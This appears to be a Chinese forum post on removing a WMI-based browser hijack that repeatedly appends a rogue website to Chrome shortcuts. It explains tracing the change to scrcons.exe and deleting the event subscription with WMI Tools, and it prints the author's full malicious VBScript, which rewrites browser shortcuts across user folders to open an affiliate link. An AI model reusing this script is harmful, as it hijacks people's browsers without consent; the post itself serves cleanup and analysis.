這裡只說WMI的解決方法： 先說現象： 通過chrome快捷方式開啟後（包括開始選單和工作列裡的），直接會開啟一個流氓網站 檢視快捷方式發現“目標欄”裡，啟動路徑最後多了那個流氓網站的地址，刪除後，隔一段時間會再被加上去。 =================================================================================== 這裡說下排查方法 用程序監控軟體或者火絨（我是用的火絨，不喜歡殺軟的用前者），監控到每隔一小時scrcons.exe程式會去修改快捷方式。   網上關於這個程式解釋很專業，理解有點難，我的理解是它類似cmd,wmi裡的指令碼程式通過它能達到修改系統的目的。 處理方法 去下載一個WMI Tools 微軟官方下載連線404了，只能在第三方下，找個靠譜的軟體網站下吧。 1、裝好WMI Tools開啟 2、點左上上角筆形按鈕 3、輸入 root\subscription，這個位置應該是會變的，因為我看其他人WMI劫持，2016年之前的路徑都是root\CIMV2,隨著時間推移，指令碼製作者肯定也會再改變，一般來說會在root下面，我不是製作者，也對這個不熟，不敢保證，如果遇到scrcons.exe修改快捷方式的話，就到root下找吧。 4、進去以後會提示登入，只用點確定就行了。 5、最後會到達這樣一個介面：（我的已經刪了，在網上隨便找的圖方便理解） 每一個資料夾進去後都是這樣，但是劫持指令碼卻不一定在這裡，需要一一尋找，如圖：  這三個選項都要一一排查，所以排查工作是很累的事。（如果有什麼好辦法麻煩個我說下，我就是自己一個一個資料夾排查的） 有問題的項是這樣的：    這種前面有個藍色方塊的才是指令碼，名字是沒有規律的，這個我是在網上找的，我自己的已經刪了，不是“unown_filter”這種一眼看上去就有問題的，我自己的是"syscheckmemXXX"所以不要光看名字，都要點進去看。 方法如下： 點選左側_EventFilter:Name="unown_filter"，再至右側右鍵點選ActiveScriptEventConsume r Name="unown"，右鍵選擇view instant properties 然後看有沒有，紅色方框內的內容，沒有就說明是正常的，有就需要仔細檢查，我找了那麼多檔案件，還沒找到過正常的，有ScripText項的藍色方塊。
 把裡面內容複製出來，有問題的一眼就能看出來,這裡貼下我自己的指令碼： Dim objFS:Set objFS = CreateObject("Scripting.FileSystemObject"):On Error Resume Next :Const link = " http://www.2345.com/?35488":browsers = Array("IEXPLORE.EXE", "chrome.exe","360chrome.exe","firefox.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe","chrome.exe","360chrome.exe"):Set BrowserDic = CreateObject("scripting.dictionary"):For Each browser In browsers:BrowserDic.Add LCase(browser), browser:Next:Dim FoldersDic(12):Set WshShell = CreateObject("Wscript.Shell"):FoldersDic(0) = "C:\Users\Public\Desktop":FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu":FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs":FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup":FoldersDic(4) = "C:\Users\Administrator.USER-20151224BY\Desktop":FoldersDic(5) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming\Microsoft\Windows\Start Menu":FoldersDic(6) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":FoldersDic(7) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup":FoldersDic(8) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming":FoldersDic(9) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":FoldersDic(10) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu":FoldersDic(11) = "C:\Users\Administrator.USER-20151224BY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar":Set fso = CreateObject("Scripting.Filesystemobject"):For i = 0 To UBound(FoldersDic):For Each file In fso.GetFolder(FoldersDic(i)).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If BrowserDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:Next:createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0 ======================================================================================== 看內容基本一眼就看出問題了吧。 如果覺得以上方法很複雜，可以直接將瀏覽器快捷方式重新命名，比如chrome.exe換成wochaxx.exe，應該不包含常見瀏覽器名字的關鍵字應該就不會被改了，但是你能忍受蒼蠅在你喉嚨的感覺麼？